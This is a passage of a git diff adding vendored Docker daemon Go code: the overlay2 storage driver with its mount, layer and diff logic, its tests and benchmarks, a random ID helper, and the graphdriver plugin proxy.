json.NewEncoder(w).Encode(options); err != nil { + return fmt.Errorf("mountfrom json encode to pipe failed: %v", err) + } + w.Close() + + if err := cmd.Wait(); err != nil { + return fmt.Errorf("mountfrom re-exec error: %v: output: %s", err, output) + } + return nil +} + +// mountfromMain is the entry-point for docker-mountfrom on re-exec. 
+func mountFromMain() { + runtime.LockOSThread() + flag.Parse() + + var options *mountOptions + + if err := json.NewDecoder(os.Stdin).Decode(&options); err != nil { + fatal(err) + } + + if err := os.Chdir(flag.Arg(0)); err != nil { + fatal(err) + } + + if err := syscall.Mount(options.Device, options.Target, options.Type, uintptr(options.Flag), options.Label); err != nil { + fatal(err) + } + + os.Exit(0) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go new file mode 100644 index 0000000000..65ac6bfaeb --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go @@ -0,0 +1,662 @@ +// +build linux + +package overlay2 + +import ( + "bufio" + "errors" + "fmt" + "io" + "io/ioutil" + "os" + "os/exec" + "path" + "path/filepath" + "strconv" + "strings" + "sync" + "syscall" + + "github.com/Sirupsen/logrus" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/daemon/graphdriver/overlayutils" + "github.com/docker/docker/daemon/graphdriver/quota" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/directory" + "github.com/docker/docker/pkg/fsutils" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/parsers" + "github.com/docker/docker/pkg/parsers/kernel" + "github.com/docker/go-units" + + "github.com/opencontainers/runc/libcontainer/label" +) + +var ( + // untar defines the untar method + untar = chrootarchive.UntarUncompressed +) + +// This backend uses the overlay union filesystem for containers +// with diff directories for each layer. + +// This version of the overlay driver requires at least kernel +// 4.0.0 in order to support mounting multiple diff directories. + +// Each container/image has at least a "diff" directory and "link" file. 
+// If there is also a "lower" file when there are diff layers +// below as well as "merged" and "work" directories. The "diff" directory +// has the upper layer of the overlay and is used to capture any +// changes to the layer. The "lower" file contains all the lower layer +// mounts separated by ":" and ordered from uppermost to lowermost +// layers. The overlay itself is mounted in the "merged" directory, +// and the "work" dir is needed for overlay to work. + +// The "link" file for each layer contains a unique string for the layer. +// Under the "l" directory at the root there will be a symbolic link +// with that unique string pointing the "diff" directory for the layer. +// The symbolic links are used to reference lower layers in the "lower" +// file and on mount. The links are used to shorten the total length +// of a layer reference without requiring changes to the layer identifier +// or root directory. Mounts are always done relative to root and +// referencing the symbolic links in order to ensure the number of +// lower directories can fit in a single page for making the mount +// syscall. A hard upper limit of 128 lower layers is enforced to ensure +// that mounts do not fail due to length. + +const ( + driverName = "overlay2" + linkDir = "l" + lowerFile = "lower" + maxDepth = 128 + + // idLength represents the number of random characters + // which can be used to create the unique link identifer + // for every layer. If this value is too long then the + // page size limit for the mount command may be exceeded. + // The idLength should be selected such that following equation + // is true (512 is a buffer for label metadata). + // ((idLength + len(linkDir) + 1) * maxDepth) <= (pageSize - 512) + idLength = 26 +) + +type overlayOptions struct { + overrideKernelCheck bool + quota quota.Quota +} + +// Driver contains information about the home directory and the list of active mounts that are created using this driver. 
+type Driver struct { + home string + uidMaps []idtools.IDMap + gidMaps []idtools.IDMap + ctr *graphdriver.RefCounter + quotaCtl *quota.Control + options overlayOptions + naiveDiff graphdriver.DiffDriver + supportsDType bool +} + +var ( + backingFs = "" + projectQuotaSupported = false + + useNaiveDiffLock sync.Once + useNaiveDiffOnly bool +) + +func init() { + graphdriver.Register(driverName, Init) +} + +// Init returns the a native diff driver for overlay filesystem. +// If overlay filesystem is not supported on the host, graphdriver.ErrNotSupported is returned as error. +// If an overlay filesystem is not supported over an existing filesystem then error graphdriver.ErrIncompatibleFS is returned. +func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { + opts, err := parseOptions(options) + if err != nil { + return nil, err + } + + if err := supportsOverlay(); err != nil { + return nil, graphdriver.ErrNotSupported + } + + // require kernel 4.0.0 to ensure multiple lower dirs are supported + v, err := kernel.GetKernelVersion() + if err != nil { + return nil, err + } + if kernel.CompareKernelVersion(*v, kernel.VersionInfo{Kernel: 4, Major: 0, Minor: 0}) < 0 { + if !opts.overrideKernelCheck { + return nil, graphdriver.ErrNotSupported + } + logrus.Warn("Using pre-4.0.0 kernel for overlay2, mount failures may require kernel update") + } + + fsMagic, err := graphdriver.GetFSMagic(home) + if err != nil { + return nil, err + } + if fsName, ok := graphdriver.FsNames[fsMagic]; ok { + backingFs = fsName + } + + // check if they are running over btrfs, aufs, zfs, overlay, or ecryptfs + switch fsMagic { + case graphdriver.FsMagicBtrfs, graphdriver.FsMagicAufs, graphdriver.FsMagicZfs, graphdriver.FsMagicOverlay, graphdriver.FsMagicEcryptfs: + logrus.Errorf("'overlay2' is not supported over %s", backingFs) + return nil, graphdriver.ErrIncompatibleFS + } + + rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) + if err 
!= nil { + return nil, err + } + // Create the driver home dir + if err := idtools.MkdirAllAs(path.Join(home, linkDir), 0700, rootUID, rootGID); err != nil && !os.IsExist(err) { + return nil, err + } + + if err := mount.MakePrivate(home); err != nil { + return nil, err + } + + supportsDType, err := fsutils.SupportsDType(home) + if err != nil { + return nil, err + } + if !supportsDType { + // not a fatal error until v1.16 (#27443) + logrus.Warn(overlayutils.ErrDTypeNotSupported("overlay2", backingFs)) + } + + d := &Driver{ + home: home, + uidMaps: uidMaps, + gidMaps: gidMaps, + ctr: graphdriver.NewRefCounter(graphdriver.NewFsChecker(graphdriver.FsMagicOverlay)), + supportsDType: supportsDType, + } + + d.naiveDiff = graphdriver.NewNaiveDiffDriver(d, uidMaps, gidMaps) + + if backingFs == "xfs" { + // Try to enable project quota support over xfs. + if d.quotaCtl, err = quota.NewControl(home); err == nil { + projectQuotaSupported = true + } + } + + logrus.Debugf("backingFs=%s, projectQuotaSupported=%v", backingFs, projectQuotaSupported) + + return d, nil +} + +func parseOptions(options []string) (*overlayOptions, error) { + o := &overlayOptions{} + for _, option := range options { + key, val, err := parsers.ParseKeyValueOpt(option) + if err != nil { + return nil, err + } + key = strings.ToLower(key) + switch key { + case "overlay2.override_kernel_check": + o.overrideKernelCheck, err = strconv.ParseBool(val) + if err != nil { + return nil, err + } + + default: + return nil, fmt.Errorf("overlay2: Unknown option %s\n", key) + } + } + return o, nil +} + +func supportsOverlay() error { + // We can try to modprobe overlay first before looking at + // proc/filesystems for when overlay is supported + exec.Command("modprobe", "overlay").Run() + + f, err := os.Open("/proc/filesystems") + if err != nil { + return err + } + defer f.Close() + + s := bufio.NewScanner(f) + for s.Scan() { + if s.Text() == "nodev\toverlay" { + return nil + } + } + logrus.Error("'overlay' not found as a 
supported filesystem on this host. Please ensure kernel is new enough and has overlay support loaded.") + return graphdriver.ErrNotSupported +} + +func useNaiveDiff(home string) bool { + useNaiveDiffLock.Do(func() { + if err := hasOpaqueCopyUpBug(home); err != nil { + logrus.Warnf("Not using native diff for overlay2: %v", err) + useNaiveDiffOnly = true + } + }) + return useNaiveDiffOnly +} + +func (d *Driver) String() string { + return driverName +} + +// Status returns current driver information in a two dimensional string array. +// Output contains "Backing Filesystem" used in this implementation. +func (d *Driver) Status() [][2]string { + return [][2]string{ + {"Backing Filesystem", backingFs}, + {"Supports d_type", strconv.FormatBool(d.supportsDType)}, + {"Native Overlay Diff", strconv.FormatBool(!useNaiveDiff(d.home))}, + } +} + +// GetMetadata returns meta data about the overlay driver such as +// LowerDir, UpperDir, WorkDir and MergeDir used to store data. +func (d *Driver) GetMetadata(id string) (map[string]string, error) { + dir := d.dir(id) + if _, err := os.Stat(dir); err != nil { + return nil, err + } + + metadata := map[string]string{ + "WorkDir": path.Join(dir, "work"), + "MergedDir": path.Join(dir, "merged"), + "UpperDir": path.Join(dir, "diff"), + } + + lowerDirs, err := d.getLowerDirs(id) + if err != nil { + return nil, err + } + if len(lowerDirs) > 0 { + metadata["LowerDir"] = strings.Join(lowerDirs, ":") + } + + return metadata, nil +} + +// Cleanup any state created by overlay which should be cleaned when daemon +// is being shutdown. For now, we just have to unmount the bind mounted +// we had created. +func (d *Driver) Cleanup() error { + return mount.Unmount(d.home) +} + +// CreateReadWrite creates a layer that is writable for use as a container +// file system. 
+func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { + return d.Create(id, parent, opts) +} + +// Create is used to create the upper, lower, and merge directories required for overlay fs for a given id. +// The parent filesystem is used to configure these directories for the overlay. +func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr error) { + + if opts != nil && len(opts.StorageOpt) != 0 && !projectQuotaSupported { + return fmt.Errorf("--storage-opt is supported only for overlay over xfs with 'pquota' mount option") + } + + dir := d.dir(id) + + rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) + if err != nil { + return err + } + if err := idtools.MkdirAllAs(path.Dir(dir), 0700, rootUID, rootGID); err != nil { + return err + } + if err := idtools.MkdirAs(dir, 0700, rootUID, rootGID); err != nil { + return err + } + + defer func() { + // Clean up on failure + if retErr != nil { + os.RemoveAll(dir) + } + }() + + if opts != nil && len(opts.StorageOpt) > 0 { + driver := &Driver{} + if err := d.parseStorageOpt(opts.StorageOpt, driver); err != nil { + return err + } + + if driver.options.quota.Size > 0 { + // Set container disk quota limit + if err := d.quotaCtl.SetQuota(dir, driver.options.quota); err != nil { + return err + } + } + } + + if err := idtools.MkdirAs(path.Join(dir, "diff"), 0755, rootUID, rootGID); err != nil { + return err + } + + lid := generateID(idLength) + if err := os.Symlink(path.Join("..", id, "diff"), path.Join(d.home, linkDir, lid)); err != nil { + return err + } + + // Write link id to link file + if err := ioutil.WriteFile(path.Join(dir, "link"), []byte(lid), 0644); err != nil { + return err + } + + // if no parent directory, done + if parent == "" { + return nil + } + + if err := idtools.MkdirAs(path.Join(dir, "work"), 0700, rootUID, rootGID); err != nil { + return err + } + if err := idtools.MkdirAs(path.Join(dir, "merged"), 0700, rootUID, rootGID); err 
!= nil { + return err + } + + lower, err := d.getLower(parent) + if err != nil { + return err + } + if lower != "" { + if err := ioutil.WriteFile(path.Join(dir, lowerFile), []byte(lower), 0666); err != nil { + return err + } + } + + return nil +} + +// Parse overlay storage options +func (d *Driver) parseStorageOpt(storageOpt map[string]string, driver *Driver) error { + // Read size to set the disk project quota per container + for key, val := range storageOpt { + key := strings.ToLower(key) + switch key { + case "size": + size, err := units.RAMInBytes(val) + if err != nil { + return err + } + driver.options.quota.Size = uint64(size) + default: + return fmt.Errorf("Unknown option %s", key) + } + } + + return nil +} + +func (d *Driver) getLower(parent string) (string, error) { + parentDir := d.dir(parent) + + // Ensure parent exists + if _, err := os.Lstat(parentDir); err != nil { + return "", err + } + + // Read Parent link fileA + parentLink, err := ioutil.ReadFile(path.Join(parentDir, "link")) + if err != nil { + return "", err + } + lowers := []string{path.Join(linkDir, string(parentLink))} + + parentLower, err := ioutil.ReadFile(path.Join(parentDir, lowerFile)) + if err == nil { + parentLowers := strings.Split(string(parentLower), ":") + lowers = append(lowers, parentLowers...) 
+ } + if len(lowers) > maxDepth { + return "", errors.New("max depth exceeded") + } + return strings.Join(lowers, ":"), nil +} + +func (d *Driver) dir(id string) string { + return path.Join(d.home, id) +} + +func (d *Driver) getLowerDirs(id string) ([]string, error) { + var lowersArray []string + lowers, err := ioutil.ReadFile(path.Join(d.dir(id), lowerFile)) + if err == nil { + for _, s := range strings.Split(string(lowers), ":") { + lp, err := os.Readlink(path.Join(d.home, s)) + if err != nil { + return nil, err + } + lowersArray = append(lowersArray, path.Clean(path.Join(d.home, linkDir, lp))) + } + } else if !os.IsNotExist(err) { + return nil, err + } + return lowersArray, nil +} + +// Remove cleans the directories that are created for this id. +func (d *Driver) Remove(id string) error { + dir := d.dir(id) + lid, err := ioutil.ReadFile(path.Join(dir, "link")) + if err == nil { + if err := os.RemoveAll(path.Join(d.home, linkDir, string(lid))); err != nil { + logrus.Debugf("Failed to remove link: %v", err) + } + } + + if err := os.RemoveAll(dir); err != nil && !os.IsNotExist(err) { + return err + } + return nil +} + +// Get creates and mounts the required file system for the given id and returns the mount path. 
+func (d *Driver) Get(id string, mountLabel string) (s string, err error) { + dir := d.dir(id) + if _, err := os.Stat(dir); err != nil { + return "", err + } + + diffDir := path.Join(dir, "diff") + lowers, err := ioutil.ReadFile(path.Join(dir, lowerFile)) + if err != nil { + // If no lower, just return diff directory + if os.IsNotExist(err) { + return diffDir, nil + } + return "", err + } + + mergedDir := path.Join(dir, "merged") + if count := d.ctr.Increment(mergedDir); count > 1 { + return mergedDir, nil + } + defer func() { + if err != nil { + if c := d.ctr.Decrement(mergedDir); c <= 0 { + syscall.Unmount(mergedDir, 0) + } + } + }() + + workDir := path.Join(dir, "work") + splitLowers := strings.Split(string(lowers), ":") + absLowers := make([]string, len(splitLowers)) + for i, s := range splitLowers { + absLowers[i] = path.Join(d.home, s) + } + opts := fmt.Sprintf("lowerdir=%s,upperdir=%s,workdir=%s", strings.Join(absLowers, ":"), path.Join(dir, "diff"), path.Join(dir, "work")) + mountData := label.FormatMountLabel(opts, mountLabel) + mount := syscall.Mount + mountTarget := mergedDir + + pageSize := syscall.Getpagesize() + + // Go can return a larger page size than supported by the system + // as of go 1.7. This will be fixed in 1.8 and this block can be + // removed when building with 1.8. + // See https://github.com/golang/go/commit/1b9499b06989d2831e5b156161d6c07642926ee1 + // See https://github.com/docker/docker/issues/27384 + if pageSize > 4096 { + pageSize = 4096 + } + + // Use relative paths and mountFrom when the mount data has exceeded + // the page size. The mount syscall fails if the mount data cannot + // fit within a page and relative links make the mount data much + // smaller at the expense of requiring a fork exec to chroot. 
+ if len(mountData) > pageSize { + opts = fmt.Sprintf("lowerdir=%s,upperdir=%s,workdir=%s", string(lowers), path.Join(id, "diff"), path.Join(id, "work")) + mountData = label.FormatMountLabel(opts, mountLabel) + if len(mountData) > pageSize { + return "", fmt.Errorf("cannot mount layer, mount label too large %d", len(mountData)) + } + + mount = func(source string, target string, mType string, flags uintptr, label string) error { + return mountFrom(d.home, source, target, mType, flags, label) + } + mountTarget = path.Join(id, "merged") + } + + if err := mount("overlay", mountTarget, "overlay", 0, mountData); err != nil { + return "", fmt.Errorf("error creating overlay mount to %s: %v", mergedDir, err) + } + + // chown "workdir/work" to the remapped root UID/GID. Overlay fs inside a + // user namespace requires this to move a directory from lower to upper. + rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) + if err != nil { + return "", err + } + + if err := os.Chown(path.Join(workDir, "work"), rootUID, rootGID); err != nil { + return "", err + } + + return mergedDir, nil +} + +// Put unmounts the mount path created for the give id. +func (d *Driver) Put(id string) error { + mountpoint := path.Join(d.dir(id), "merged") + if count := d.ctr.Decrement(mountpoint); count > 0 { + return nil + } + if err := syscall.Unmount(mountpoint, 0); err != nil { + logrus.Debugf("Failed to unmount %s overlay: %s - %v", id, mountpoint, err) + } + return nil +} + +// Exists checks to see if the id is already mounted. 
+func (d *Driver) Exists(id string) bool { + _, err := os.Stat(d.dir(id)) + return err == nil +} + +// isParent returns if the passed in parent is the direct parent of the passed in layer +func (d *Driver) isParent(id, parent string) bool { + lowers, err := d.getLowerDirs(id) + if err != nil { + return false + } + if parent == "" && len(lowers) > 0 { + return false + } + + parentDir := d.dir(parent) + var ld string + if len(lowers) > 0 { + ld = filepath.Dir(lowers[0]) + } + if ld == "" && parent == "" { + return true + } + return ld == parentDir +} + +// ApplyDiff applies the new layer into a root +func (d *Driver) ApplyDiff(id string, parent string, diff io.Reader) (size int64, err error) { + if !d.isParent(id, parent) { + return d.naiveDiff.ApplyDiff(id, parent, diff) + } + + applyDir := d.getDiffPath(id) + + logrus.Debugf("Applying tar in %s", applyDir) + // Overlay doesn't need the parent id to apply the diff + if err := untar(diff, applyDir, &archive.TarOptions{ + UIDMaps: d.uidMaps, + GIDMaps: d.gidMaps, + WhiteoutFormat: archive.OverlayWhiteoutFormat, + }); err != nil { + return 0, err + } + + return directory.Size(applyDir) +} + +func (d *Driver) getDiffPath(id string) string { + dir := d.dir(id) + + return path.Join(dir, "diff") +} + +// DiffSize calculates the changes between the specified id +// and its parent and returns the size in bytes of the changes +// relative to its base filesystem directory. +func (d *Driver) DiffSize(id, parent string) (size int64, err error) { + if useNaiveDiff(d.home) || !d.isParent(id, parent) { + return d.naiveDiff.DiffSize(id, parent) + } + return directory.Size(d.getDiffPath(id)) +} + +// Diff produces an archive of the changes between the specified +// layer and its parent layer which may be "". 
+func (d *Driver) Diff(id, parent string) (io.ReadCloser, error) { + if useNaiveDiff(d.home) || !d.isParent(id, parent) { + return d.naiveDiff.Diff(id, parent) + } + + diffPath := d.getDiffPath(id) + logrus.Debugf("Tar with options on %s", diffPath) + return archive.TarWithOptions(diffPath, &archive.TarOptions{ + Compression: archive.Uncompressed, + UIDMaps: d.uidMaps, + GIDMaps: d.gidMaps, + WhiteoutFormat: archive.OverlayWhiteoutFormat, + }) +} + +// Changes produces a list of changes between the specified layer +// and its parent layer. If parent is "", then all changes will be ADD changes. +func (d *Driver) Changes(id, parent string) ([]archive.Change, error) { + if useNaiveDiff(d.home) || !d.isParent(id, parent) { + return d.naiveDiff.Changes(id, parent) + } + // Overlay doesn't have snapshots, so we need to get changes from all parent + // layers. + diffPath := d.getDiffPath(id) + layers, err := d.getLowerDirs(id) + if err != nil { + return nil, err + } + + return archive.OverlayChanges(layers, diffPath) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go new file mode 100644 index 0000000000..cf77ff22be --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go @@ -0,0 +1,121 @@ +// +build linux + +package overlay2 + +import ( + "io/ioutil" + "os" + "syscall" + "testing" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/daemon/graphdriver/graphtest" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/reexec" +) + +func init() { + // Do not sure chroot to speed run time and allow archive + // errors or hangs to be debugged directly from the test process. 
+ untar = archive.UntarUncompressed + graphdriver.ApplyUncompressedLayer = archive.ApplyUncompressedLayer + + reexec.Init() +} + +func cdMountFrom(dir, device, target, mType, label string) error { + wd, err := os.Getwd() + if err != nil { + return err + } + os.Chdir(dir) + defer os.Chdir(wd) + + return syscall.Mount(device, target, mType, 0, label) +} + +func skipIfNaive(t *testing.T) { + td, err := ioutil.TempDir("", "naive-check-") + if err != nil { + t.Fatalf("Failed to create temp dir: %v", err) + } + defer os.RemoveAll(td) + + if useNaiveDiff(td) { + t.Skipf("Cannot run test with naive diff") + } +} + +// This avoids creating a new driver for each test if all tests are run +// Make sure to put new tests between TestOverlaySetup and TestOverlayTeardown +func TestOverlaySetup(t *testing.T) { + graphtest.GetDriver(t, driverName) +} + +func TestOverlayCreateEmpty(t *testing.T) { + graphtest.DriverTestCreateEmpty(t, driverName) +} + +func TestOverlayCreateBase(t *testing.T) { + graphtest.DriverTestCreateBase(t, driverName) +} + +func TestOverlayCreateSnap(t *testing.T) { + graphtest.DriverTestCreateSnap(t, driverName) +} + +func TestOverlay128LayerRead(t *testing.T) { + graphtest.DriverTestDeepLayerRead(t, 128, driverName) +} + +func TestOverlayDiffApply10Files(t *testing.T) { + skipIfNaive(t) + graphtest.DriverTestDiffApply(t, 10, driverName) +} + +func TestOverlayChanges(t *testing.T) { + skipIfNaive(t) + graphtest.DriverTestChanges(t, driverName) +} + +func TestOverlayTeardown(t *testing.T) { + graphtest.PutDriver(t) +} + +// Benchmarks should always setup new driver + +func BenchmarkExists(b *testing.B) { + graphtest.DriverBenchExists(b, driverName) +} + +func BenchmarkGetEmpty(b *testing.B) { + graphtest.DriverBenchGetEmpty(b, driverName) +} + +func BenchmarkDiffBase(b *testing.B) { + graphtest.DriverBenchDiffBase(b, driverName) +} + +func BenchmarkDiffSmallUpper(b *testing.B) { + graphtest.DriverBenchDiffN(b, 10, 10, driverName) +} + +func 
BenchmarkDiff10KFileUpper(b *testing.B) { + graphtest.DriverBenchDiffN(b, 10, 10000, driverName) +} + +func BenchmarkDiff10KFilesBottom(b *testing.B) { + graphtest.DriverBenchDiffN(b, 10000, 10, driverName) +} + +func BenchmarkDiffApply100(b *testing.B) { + graphtest.DriverBenchDiffApplyN(b, 100, driverName) +} + +func BenchmarkDiff20Layers(b *testing.B) { + graphtest.DriverBenchDeepLayerDiff(b, 20, driverName) +} + +func BenchmarkRead20Layers(b *testing.B) { + graphtest.DriverBenchDeepLayerRead(b, 20, driverName) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go new file mode 100644 index 0000000000..e5ac4ca8c6 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go @@ -0,0 +1,3 @@ +// +build !linux + +package overlay2 diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go new file mode 100644 index 0000000000..af5cb659d5 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go @@ -0,0 +1,80 @@ +// +build linux + +package overlay2 + +import ( + "crypto/rand" + "encoding/base32" + "fmt" + "io" + "os" + "syscall" + "time" + + "github.com/Sirupsen/logrus" +) + +// generateID creates a new random string identifier with the given length +func generateID(l int) string { + const ( + // ensures we backoff for less than 450ms total. Use the following to + // select new value, in units of 10ms: + // n*(n+1)/2 = d -> n^2 + n - 2d -> n = (sqrt(8d + 1) - 1)/2 + maxretries = 9 + backoff = time.Millisecond * 10 + ) + + var ( + totalBackoff time.Duration + count int + retries int + size = (l*5 + 7) / 8 + u = make([]byte, size) + ) + // TODO: Include time component, counter component, random component + + for { + // This should never block but the read may fail. 
Because of this, + // we just try to read the random number generator until we get + // something. This is a very rare condition but may happen. + b := time.Duration(retries) * backoff + time.Sleep(b) + totalBackoff += b + + n, err := io.ReadFull(rand.Reader, u[count:]) + if err != nil { + if retryOnError(err) && retries < maxretries { + count += n + retries++ + logrus.Errorf("error generating version 4 uuid, retrying: %v", err) + continue + } + + // Any other errors represent a system problem. What did someone + // do to /dev/urandom? + panic(fmt.Errorf("error reading random number generator, retried for %v: %v", totalBackoff.String(), err)) + } + + break + } + + s := base32.StdEncoding.EncodeToString(u) + + return s[:l] +} + +// retryOnError tries to detect whether or not retrying would be fruitful. +func retryOnError(err error) bool { + switch err := err.(type) { + case *os.PathError: + return retryOnError(err.Err) // unpack the target error + case syscall.Errno: + if err == syscall.EPERM { + // EPERM represents an entropy pool exhaustion, a condition under + // which we backoff and retry. + return true + } + } + + return false +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go new file mode 100644 index 0000000000..67c6640b4b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go @@ -0,0 +1,18 @@ +// +build linux + +package overlayutils + +import ( + "errors" + "fmt" +) + +// ErrDTypeNotSupported denotes that the backing filesystem doesn't support d_type. +func ErrDTypeNotSupported(driver, backingFs string) error { + msg := fmt.Sprintf("%s: the backing %s filesystem is formatted without d_type support, which leads to incorrect behavior.", driver, backingFs) + if backingFs == "xfs" { + msg += " Reformat the filesystem with ftype=1 to enable d_type support." 
+ } + msg += " Running without d_type support will no longer be supported in Docker 1.16." + return errors.New(msg) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/plugin.go b/vendor/github.com/docker/docker/daemon/graphdriver/plugin.go new file mode 100644 index 0000000000..7294bcc5f6 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/plugin.go @@ -0,0 +1,43 @@ +package graphdriver + +import ( + "fmt" + "io" + "path/filepath" + + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/plugin/v2" +) + +type pluginClient interface { + // Call calls the specified method with the specified arguments for the plugin. + Call(string, interface{}, interface{}) error + // Stream calls the specified method with the specified arguments for the plugin and returns the response IO stream + Stream(string, interface{}) (io.ReadCloser, error) + // SendFile calls the specified method, and passes through the IO stream + SendFile(string, io.Reader, interface{}) error +} + +func lookupPlugin(name string, pg plugingetter.PluginGetter, config Options) (Driver, error) { + if !config.ExperimentalEnabled { + return nil, fmt.Errorf("graphdriver plugins are only supported with experimental mode") + } + pl, err := pg.Get(name, "GraphDriver", plugingetter.ACQUIRE) + if err != nil { + return nil, fmt.Errorf("Error looking up graphdriver plugin %s: %v", name, err) + } + return newPluginDriver(name, pl, config) +} + +func newPluginDriver(name string, pl plugingetter.CompatPlugin, config Options) (Driver, error) { + home := config.Root + if !pl.IsV1() { + if p, ok := pl.(*v2.Plugin); ok { + if p.PropagatedMount != "" { + home = p.PluginObj.Config.PropagatedMount + } + } + } + proxy := &graphDriverProxy{name, pl} + return proxy, proxy.Init(filepath.Join(home, name), config.DriverOptions, config.UIDMaps, config.GIDMaps) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/proxy.go 
b/vendor/github.com/docker/docker/daemon/graphdriver/proxy.go new file mode 100644 index 0000000000..bfe74cc6f9 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/proxy.go @@ -0,0 +1,252 @@ +package graphdriver + +import ( + "errors" + "fmt" + "io" + "path/filepath" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/plugingetter" +) + +type graphDriverProxy struct { + name string + p plugingetter.CompatPlugin +} + +type graphDriverRequest struct { + ID string `json:",omitempty"` + Parent string `json:",omitempty"` + MountLabel string `json:",omitempty"` + StorageOpt map[string]string `json:",omitempty"` +} + +type graphDriverResponse struct { + Err string `json:",omitempty"` + Dir string `json:",omitempty"` + Exists bool `json:",omitempty"` + Status [][2]string `json:",omitempty"` + Changes []archive.Change `json:",omitempty"` + Size int64 `json:",omitempty"` + Metadata map[string]string `json:",omitempty"` +} + +type graphDriverInitRequest struct { + Home string + Opts []string `json:"Opts"` + UIDMaps []idtools.IDMap `json:"UIDMaps"` + GIDMaps []idtools.IDMap `json:"GIDMaps"` +} + +func (d *graphDriverProxy) Init(home string, opts []string, uidMaps, gidMaps []idtools.IDMap) error { + if !d.p.IsV1() { + if cp, ok := d.p.(plugingetter.CountedPlugin); ok { + // always acquire here, it will be cleaned up on daemon shutdown + cp.Acquire() + } + } + args := &graphDriverInitRequest{ + Home: home, + Opts: opts, + UIDMaps: uidMaps, + GIDMaps: gidMaps, + } + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.Init", args, &ret); err != nil { + return err + } + if ret.Err != "" { + return errors.New(ret.Err) + } + return nil +} + +func (d *graphDriverProxy) String() string { + return d.name +} + +func (d *graphDriverProxy) CreateReadWrite(id, parent string, opts *CreateOpts) error { + args := &graphDriverRequest{ + ID: id, + Parent: parent, + } + if opts != nil { + 
args.MountLabel = opts.MountLabel + args.StorageOpt = opts.StorageOpt + } + + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.CreateReadWrite", args, &ret); err != nil { + return err + } + if ret.Err != "" { + return errors.New(ret.Err) + } + return nil +} + +func (d *graphDriverProxy) Create(id, parent string, opts *CreateOpts) error { + args := &graphDriverRequest{ + ID: id, + Parent: parent, + } + if opts != nil { + args.MountLabel = opts.MountLabel + args.StorageOpt = opts.StorageOpt + } + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.Create", args, &ret); err != nil { + return err + } + if ret.Err != "" { + return errors.New(ret.Err) + } + return nil +} + +func (d *graphDriverProxy) Remove(id string) error { + args := &graphDriverRequest{ID: id} + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.Remove", args, &ret); err != nil { + return err + } + if ret.Err != "" { + return errors.New(ret.Err) + } + return nil +} + +func (d *graphDriverProxy) Get(id, mountLabel string) (string, error) { + args := &graphDriverRequest{ + ID: id, + MountLabel: mountLabel, + } + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.Get", args, &ret); err != nil { + return "", err + } + var err error + if ret.Err != "" { + err = errors.New(ret.Err) + } + return filepath.Join(d.p.BasePath(), ret.Dir), err +} + +func (d *graphDriverProxy) Put(id string) error { + args := &graphDriverRequest{ID: id} + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.Put", args, &ret); err != nil { + return err + } + if ret.Err != "" { + return errors.New(ret.Err) + } + return nil +} + +func (d *graphDriverProxy) Exists(id string) bool { + args := &graphDriverRequest{ID: id} + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.Exists", args, &ret); err != nil { + return false + } + return ret.Exists +} + +func (d *graphDriverProxy) Status() [][2]string { + args := 
